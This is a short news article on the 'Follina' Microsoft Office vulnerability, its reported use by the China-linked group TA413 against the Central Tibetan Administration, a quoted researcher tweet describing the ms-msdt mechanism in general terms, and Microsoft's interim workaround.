A vulnerability in Microsoft Office has been revealed, and according to security firm ‘ProofPoint’, is already being exploited by hackers linked to the Chinese government. The exploit was first revealed on May 27th, however Microsoft may have been aware of it as early as April.
The vulnerability, currently labeled “Follina” by researchers, poses a risk by offering hackers a gateway into gaining control of your device, even without opening an infected file.
ProofPoint have suggested that hacking group TA413 was making use of Follina via infected Word Documents that were to be sent from the Central Tibetan Administration, the Tibetan government who are currently in exile in India. TA413 is considered an “advanced persistent threat” and is believed to be linked to the Chinese government, having previously targeted the Central Tibetan Administration before.
Researcher Kevin Beumont says it works mostly via .rtf files, but MS Word can also be exploited via the templates feature, which allows for external code to be loaded. Follina uses this as a gateway to access MSDT, which while is usually safe, grants remote access to your device. This information was first disclosed via Twitter account ‘@nao_sec’.
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.https://t.co/hTdAfHOUx3 pic.twitter.com/rVSb02ZTwt
— nao_sec (@nao_sec) May 27, 2022
Follina has already been used for financial extortion and more. While no official patch is available as of yet, Microsoft have released a workaround via their Security Response Center
